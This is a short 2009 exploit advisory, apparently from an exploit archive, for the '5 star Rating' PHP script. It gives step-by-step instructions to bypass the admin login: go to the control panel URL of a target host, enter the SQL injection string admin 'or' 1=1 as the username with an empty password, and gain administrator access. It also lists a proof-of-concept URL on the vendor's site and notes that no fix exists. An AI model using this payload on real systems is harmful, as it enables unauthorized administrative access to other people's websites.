5 star Rating 1.2 (Auth Bypass) SQL Injection Vulnerability

2009-04-22 19:06:39

@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@ @@@ @@@
@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@@ @@@ @@@
@@! @@! @@! @@@ @@! @@@@ @@! @@@ @@! @@@ @@! !@@
!@! !@! !@! @!@ !@! @!@!@ !@! @!@ !@! @!@ !@! @!!
@!! @!!!:! @!@!!@! @!@ @! !@! @!@ !@! @!@!@!@! !@!@!
!!! !!!!!: !!@!@! !@!!! !!! !@! !!! !!!@!!!! @!!!
!!: !!: !!: :!! !!:! !!! !!: !!! !!: !!! !!:
:!: :!: :!: !:! :!: !:! :!: !:! :!: !:! :!:
:: :::: :: :::: :: ::: ::::::: :: :::: :: :: ::: ::
: :: : : : :: :: : : : : : : : :: : : : : : :


--[ Informations ]------------------------------------------------------

@author : zer0day ([email protected])
@home : gotr00t.blogspot.com
@software : 5star_rating
@version : 1.0
@web site : http://www.maniacomputer.com/5star_rating/New_5Star.html

--[ Exploit ]-----------------------------------------------------------

---{{Authentification ByPass}}
Go to :
http://[TARGET]/5star_rating/admin/control_panel_sample.php
In username just enter : admin 'or' 1=1
and empty password

You are logged in Administrator !

Simply ?

--[ Proof Of Concept ]--------------------------------------------------

http://www.maniacomputer.com/5star_rating/admin/control_panel_sample.php

--[ End Of File ]-------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.